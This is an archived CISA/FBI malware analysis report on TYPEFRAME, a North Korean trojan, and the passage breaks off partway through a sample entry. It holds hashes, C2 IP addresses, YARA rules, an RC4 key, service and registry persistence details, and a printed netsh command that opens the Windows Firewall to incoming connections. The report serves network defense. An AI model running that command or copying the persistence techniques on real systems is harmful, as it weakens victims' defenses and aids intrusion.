{
	"id": "56352a00-79cb-43a7-bfe8-1b26753379cb",
	"created_at": "2026-04-06T00:17:49.492768Z",
	"updated_at": "2026-04-10T03:38:19.371803Z",
	"deleted_at": null,
	"sha1_hash": "434235d6dfc72720cff0494511abdc0d5b214426",
	"title": "MAR-10135536-12 – North Korean Trojan: TYPEFRAME | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 178894,
	"plain_text": "MAR-10135536-12 – North Korean Trojan: TYPEFRAME | CISA\r\nPublished: 2019-03-14 · Archived: 2026-04-05 18:40:45 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained within. The DHS does not endorse any commercial\r\nproduct or service, referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol, see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between Department of Homeland Security (DHS) and\r\nthe Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan\r\nmalware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S.\r\nGovernment refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information\r\non HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.\r\nDHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government\r\nmalicious cyber activity.\r\nThis MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended\r\nmitigation techniques. 
Users or administrators should flag activity associated with the malware, report the activity to CISA\r\nor the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.\r\nThis malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a\r\nmalicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the\r\ncapability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and\r\ncontrol (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections.\r\nFor a downloadable copy of IOCs, see:\r\nMAR-10135536-12.stix\r\nSubmitted Files (11)\r\n201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33 (1C53E7269FE9D84C6DF0A25BA59B82...)\r\n20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n(EF9DB20AB0EEBF0B7C55AF4EC0B7BC...)\r\n3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210 (java.exe)\r\n40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116 (CA67F84D5A4AC1459934128442C53B...)\r\n4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd (3229A6CEA658B1B3CA5CA9AD7B40D8...)\r\n546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1 (6AB301FC3296E1CEB140BF5D294894...)\r\n675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1 (10B28DA8EEFAC62CE282154F273B3E...)\r\n8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 (F5A4235EF02F34D547F71AA5434D9B...)\r\nc9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\n(BFB41BC0C3856AA0A81A5256B7B8DA...)\r\nd1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92 (BF474B8ACD55380B1169BB949D60E9...)\r\ne69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7 (60294C426865B38FDE7C5031AFC4E4...)\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 1 of 40\n\nAdditional Files 
(3)\r\n089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359 (midimapper.rs)\r\na71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6 (laxhost.dll)\r\ne088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef (dwnhost.dll)\r\nIPs (7)\r\n111.207.78.204\r\n181.119.19.56\r\n184.107.209.2\r\n59.90.93.97\r\n80.91.118.45\r\n81.0.213.173\r\n98.101.211.162\r\nFindings\r\n8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\nTags\r\nbackdoor, remote-access-trojan, trojan\r\nDetails\r\nName F5A4235EF02F34D547F71AA5434D9BB4\r\nSize 490705 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 f5a4235ef02f34d547f71aa5434d9bb4\r\nSHA1 338699d56f17ab91fa2da1cb446593c013ae1a01\r\nSHA256 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\nSHA512 27c610096248492fce0f8f478c62255cd1abc4ceb4a1ae310ca311a6d38ee3b93ce75ba45089204d0eb2036393bdcb98b3e77396d5ae6b9ee\r\nssdeep 12288:2okf/Epk6/lctEJxrXtl3h1ihDnjvAHR7ie5XtO/DRUKwS4Z/B5:2o6/EpH/iwNXtlhSnjg+e5A/DaZp5\r\nEntropy 7.788643\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAvira TR/Crypt.ZPACK.Gen\r\nBitDefender Trojan.GenericKD.31021159\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.CTWS-9289\r\nESET a variant of Win32/NukeSped.EP trojan\r\nEmsisoft Trojan.GenericKD.31021159 (B)\r\nIkarus Trojan.Crypt\r\nK7 Trojan ( 00535e7c1 )\r\nMcAfee RDN/Generic BackDoor\r\nMicrosoft Security Essentials Trojan:Win32/NukeSped\r\nNANOAV Trojan.Win32.NukeSped.feqzlz\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro BKDR_NUKESPED.I\r\nTrendMicro House Call BKDR_NUKESPED.I\r\nVirusBlokAda Backdoor.Agent\r\nZillya! 
Backdoor.Agent.Win32.66271\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\"\r\n    strings:\r\n        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }\r\n        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }\r\n        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them\r\n}\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-05 21:21:28-04:00\r\nImport Hash edb148321293bdc8b7ba8fbe0b1c6ed9\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ndde6c6e739f41680377511c709f7209a header 4096 0.590336\r\ndb44e1900789a7fd43b05d3871c9ab03 .text 53248 6.538652\r\n91d9797bd52d49fb73009fc3e0cdd7c5 .rdata 12288 3.476192\r\nef4ab26cc2c30397b12c53c759fcbef2 .data 16384 2.132158\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\n8c3e0204f5... Contains a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nDescription\r\nThis file is a 32-bit Windows portable executable file designed to install a Remote Access Trojan (RAT) as a service on the\r\nvictim system. 
The malware accepts the following argument during execution: \"68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd\".\r\nThe RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\nhost.dll\r\n\"Task Notification Service\"\r\n\"Monitors And Notifies Task Scheduling And Interaction\"\r\nnetsvcs\r\n--End strings of interest--\r\nWhen executed, the RAT checks if the module \"C:\\Windows\\system32\\laxhost.dll\" is installed on the compromised system.\r\nIf it is not installed, it loads an embedded RC4 encrypted archive file starting at offset \"0x15000\".\r\nThe malware decrypts the archive using the same RC4 key. The decrypted archive contains a malicious DLL module, which\r\nis decompressed and installed into \"C:\\Windows\\system32\\laxhost.dll\". The first three characters of the module name are\r\nrandomly generated.\r\nThe malware contains 192 bytes of RC4 encrypted configuration data. 
During runtime, it installs the encrypted\r\nconfiguration data into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe malware installs a malicious DLL module as a serviceDLL in the \"netsvcs\" service group in order to execute\r\n\"C:\\Windows\\system32\\laxhost.dll\" using the Windows service hosting process,\r\n\"%SYSTEMROOT%\\system32\\svchost.exe.\" The service name and the display name are randomly generated.\r\nThe installed service information is displayed below:\r\n--Begin service information--\r\nServiceName = \"Irmon\"\r\nDisplayName = \"Irmon\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k netsvcs\"\r\n--End service information--\r\na71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nTags\r\nbackdoor, remote-access-trojan, trojan\r\nDetails\r\nName laxhost.dll\r\nSize 843776 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 aa7924157b77dd1ff749d474f3062f90\r\nSHA1 4f02a6bf2b24c371e9f589cff8e32b4d94cf4f29\r\nSHA256 a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nSHA512 5150d8b063297d0da04288b4e4e2ad3d54b7546d909a71557789529d73703673098c37970280cd62c45306458cfcda701c1a7cee31ee7fb2\r\nssdeep 24576:r/pmC31xkE8sOvtQ6Wtuc0WhgpaM2yYq:bpj0E8sOvtQ6Wtuc0WhgpaM2yYq\r\nEntropy 6.681288\r\nAntivirus\r\nAhnlab Backdoor/Win32.Nukesped\r\nAntiy Trojan/Win32.AGeneric\r\nAvira TR/AD.LazerusAPT.cpdeh\r\nBitDefender Trojan.GenericKD.31015744\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.KSYA-1796\r\nESET a variant of Win32/NukeSped.EP 
trojan\r\nEmsisoft Trojan.GenericKD.31015744 (B)\r\nFilseclab W32.NukeSped.EP.zous\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Riskware ( 0040eff71 )\r\nMcAfee RDN/Generic BackDoor\r\nMicrosoft Security Essentials Backdoor:Win32/SilverMob.A!dha\r\nNANOAV Trojan.Win32.Redcap.fepugy\r\nSophos Troj/Cruprox-B\r\nSystweak malware.gen-ra\r\nTrendMicro BKDR_NU.6961FCEE\r\nTrendMicro House Call BKDR_NU.6961FCEE\r\nVirusBlokAda Backdoor.SilverMob\r\nZillya! Trojan.NukeSped.Win32.79\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-09 13:59:30-04:00\r\nImport Hash 180f8d53e7b967e9af9444547c05f192\r\nCompany Name Microsoft Corporation\r\nFile Description Xps Object Model in memory creation and deserialization\r\nInternal Name xpsservices.dll\r\nLegal Copyright Microsoft Corporation. 
All rights reserved.\r\nOriginal Filename xpsservices.dll\r\nProduct Name Microsoft Windows Operating System\r\nProduct Version 6.1.7601.17514\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ne1b6f98aadc18cf1b2e1796eb3d8b783 header 4096 0.800174\r\n5d97a9d06913043a085d8071f7a5ab7c .text 540672 6.661444\r\nbab7eb304870fe36e8c98f5085b8603c .rdata 163840 6.184319\r\n33e00b6b91f87e1e948a8bc44803837f .data 81920 4.853104\r\n4093ef4294e5d39c92ba4d89a6c92a15 .rsrc 8192 3.983157\r\n39ddff289842b4fafc796c9795b870c8 .reloc 45056 5.723684\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nRelationships\r\na71017302e... Connected_To 59.90.93.97\r\na71017302e... Contained_Within 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\nDescription\r\nlaxhost.dll (original name: KDCOLCWP.DLL) is a 32-bit Windows dynamic-link library (DLL) file and is a RAT module\r\nthat was installed as a service by the file 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8.\r\nlaxhost.dll’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nWhen executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains the hexadecimal-encoded C2 IP address and port number (the 16-bit port is stored\r\nlittle-endian, followed by the four octets of the IP address):\r\n--Begin IP and port # list--\r\nBB 01 3B 5A 5D 61 ==\u003e 59.90.93.97:443\r\n--End IP and port # list--\r\nThe malware attempts to connect to its C2 server 59.90.93.97 using port 443 and waits for further 
instructions.\r\nThe malware is designed to accept instructions from the remote server to perform the following functions:\r\n--Begin functions performed by the malware--\r\nGet Disk Free Space\r\nSearch for files\r\nExecute process in elevated mode\r\nTerminate processes\r\nDelete files\r\nExecute command using shell\r\nDownload and upload files\r\nRead files and write files\r\nDelete Service and uninstall malware components using a batch script\r\n--End functions performed by the malware--\r\n675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nTags\r\ndropper, proxy, trojan\r\nDetails\r\nName 10B28DA8EEFAC62CE282154F273B3E34\r\nSize 466267 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 10b28da8eefac62ce282154f273b3e34\r\nSHA1 25991d00eb1b1204b0066d5aeb79ac691047d7f0\r\nSHA256 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nSHA512 7955c46e3d5ed3454340821caecd44d6bc1b918ef7bdcd6f0f8d67676cbf0fde52a578583a0388c4d838652d3d1da4615ced6ae2c59b562f0\r\nssdeep 6144:qoXLxi/EpH/ae6jEazjsHZ3OJJMUc6ngmOsH95rjw26XwXFLP7E1tC1KRtyn5o1n:qoQ/EpH/mEaiZiJy6ngm95t6qLPJp2d\r\nEntropy 7.761748\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.TSGeneric\r\nAvira TR/Agent.ajluz\r\nBitDefender Trojan.GenericKD.31017444\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.LYOG-8913\r\nESET a variant of Win32/Agent.YDV trojan\r\nEmsisoft Trojan.GenericKD.31017444 (B)\r\nIkarus Trojan.Win32.Agent\r\nK7 Trojan ( 004fa2411 )\r\nMcAfee Generic.dvp\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.B!dha\r\nNANOAV Trojan.Win32.Drop.feqzpd\r\nSophos Troj/Agent-AZOF\r\nSymantec Trojan Horse\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda BScope.TrojanDropper.Agent\r\nZillya! 
Trojan.Agent.Win32.902273\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\"\r\n    strings:\r\n        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }\r\n        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }\r\n        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them\r\n}\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2016-07-24 19:38:33-04:00\r\nImport Hash 225e9f7be86d6676c98a852492458049\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n58c7eb8637b7fbde7bb31985b77ca1af header 4096 0.591843\r\n65d9f034d6153048c3e51bf5e07d6486 .text 53248 6.446416\r\neb9c5e8a429ac587cd35f0dcec939295 .rdata 12288 3.434883\r\nd80b556aaa361958d9ecd816ac2a36c7 .data 16384 2.106829\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\n675a35e04b... Contains e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\nDescription\r\nThis file is a 32-bit Windows executable designed to install a proxy module as a service on the victim’s system. 
This file\r\naccepts the following argument during execution: \"68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd.\"\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\n\"wmplayer.xml\"\r\n\"printcache.tlb\"\r\n\"Print Device Cache\"\r\n\"Manage Print Device Cache And Printing\"\r\nprintcache\r\n--End strings of interest--\r\nWhen executed, it loads an embedded RC4 encrypted archive file starting at offset \"0x15000.\"\r\nThe malware decrypts the archive using the same RC4 key. The decrypted archive contains a proxy module, which is\r\ndecompressed and installed from the existing file name \"wmplayer.xml\" to \"C:\\Windows\\system32\\printcache.tlb.\"\r\nThe malware installs the module as a serviceDLL in the \"printcache\" service group in order to execute\r\n\"C:\\Windows\\system32\\printcache.tlb\" using the Windows service hosting process,\r\n\"%SYSTEMROOT%\\system32\\svchost.exe.\"\r\n--Begin service--\r\nServiceName = \"printcache\"\r\nDisplayName = \"Print Device Cache\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k printcache\"\r\n--End service--\r\nThe malware contains 8 bytes of RC4 encrypted configuration data, which contain port numbers. 
During runtime, it\r\ninstalls the encrypted configuration data into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\ne69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\nTags\r\nproxy, trojan\r\nDetails\r\nName 60294C426865B38FDE7C5031AFC4E453\r\nSize 778240 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 60294c426865b38fde7c5031afc4e453\r\nSHA1 f8736e3f89f30f082cfd68a73763afcfb0e1c9c3\r\nSHA256 e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\nSHA512 fe96fa2f127a3a71a9edc89268567188f8c585ea8356feb9a2c46224dc7022b3d751848424df745b517e7a1e123c566b6feb094653281026ff\r\nssdeep 12288:8iwDMd29KJgSWD8QfEbsjlqxlsiAen1XQ1pV+jPAt:8WghEbvhAeC1pIDAt\r\nEntropy 6.714021\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.Agentb\r\nAvira TR/RedCap.gzgan\r\nBitDefender Gen:Variant.Symmi.14589\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.LQBT-4086\r\nESET Win32/NukeSped.EO trojan\r\nEmsisoft Gen:Variant.Symmi.14589 (B)\r\nIkarus Trojan-Proxy.Win32.SilverMob\r\nK7 Trojan ( 00535e7f1 )\r\nMcAfee GenericRXFZ-TW!60294C426865\r\nMicrosoft Security Essentials TrojanProxy:Win32/SilverMob.A!dha\r\nNANOAV Trojan.Win32.RedCap.feqzkt\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTACHYON Process timed out\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda Trojan.Agentb\r\nZillya! 
Trojan.Agentb.Win32.19365\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-03-02 14:01:47-05:00\r\nImport Hash 09e63e3d425d6b543de4003f71c2b66d\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n1eda6d8dec57fac45afb42a6f27080a0 header 4096 0.767469\r\n4109d939d8532ac1bd9f2cfa81a33905 .text 475136 6.632858\r\n3b24a4913977b402a4dcce1694306cfb .rdata 147456 5.923542\r\nf597eb4917ef44a2f9a080fc59f528f3 .data 77824 4.968551\r\n77c814f5856057e7a7f6237bbba51a76 .rsrc 32768 7.100017\r\n438ec3064d499d63eb03035aa1f7a142 .reloc 40960 5.759460\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nRelationships\r\ne69d6c2d3e... Contained_Within 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nDescription\r\nThis file, printcache.tlb (original name: PDll.dll), is a proxy module installed as a service by the file\r\n675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1. 
This file is designed to open the Windows\r\nFirewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy\r\nserver.\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nWhen executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains hexadecimal encoded port numbers (each 16-bit port stored little-endian):\r\n--Begin port # list--\r\nBB 01 ==\u003e 1BB ==\u003e 443\r\n7F 00 ==\u003e 7F ==\u003e 127\r\n90 1F ==\u003e 1F90 ==\u003e 8080\r\n--End port # list--\r\nThe malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming\r\nconnections.\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=443 action\"\r\n--End firewall modification--\r\nThe malware attempts to open ports 443, 127, and 8080 and waits for a connection. 
The malware contains public SSL\r\ncertificates in its resource named \"101\" and is designed to generate crafted TLS sessions (fake TLS communication\r\nmechanism).\r\n089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359\r\nTags\r\nproxy, trojan\r\nDetails\r\nName midimapper.rs\r\nSize 761856 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 00b0cfb59b088b247c97c8fed383c115\r\nSHA1 0cdee734d3a17de0e81b9b2b0b36804d516c3212\r\nSHA256 089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359\r\nSHA512 9c9f65e277816a42574ddc28724e1afde8c3bffd0e8bf2e0414204d7b07384848718ada43e59c206b6d13dca33c28c4ae3a82ec12b21207efa\r\nssdeep 12288:5XYoUXvfAkdRwowG358mOlVvRaXKgCJpV4DDxazfAF:+zwowHJ46jJp+DmfAF\r\nEntropy 6.693566\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.Agentb\r\nBitDefender Gen:Variant.Symmi.14589\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.DYIG-2477\r\nESET Win32/NukeSped.AQ trojan\r\nEmsisoft Gen:Variant.Symmi.14589 (B)\r\nIkarus Trojan.Win32.Agentb\r\nK7 Trojan ( 0051e0501 )\r\nMcAfee GenericRXFZ-TW!00B0CFB59B08\r\nMicrosoft Security Essentials TrojanProxy:Win32/SilverMob.A!dha\r\nNANOAV Trojan.Win32.NukeSped.eylorq\r\nSophos Troj/NukeSped-A\r\nSymantec Trojan.Gen.2\r\nTrendMicro TROJ_NUKESPED.D\r\nTrendMicro House Call TROJ_NUKESPED.D\r\nVirusBlokAda Trojan.Agentb\r\nZillya! 
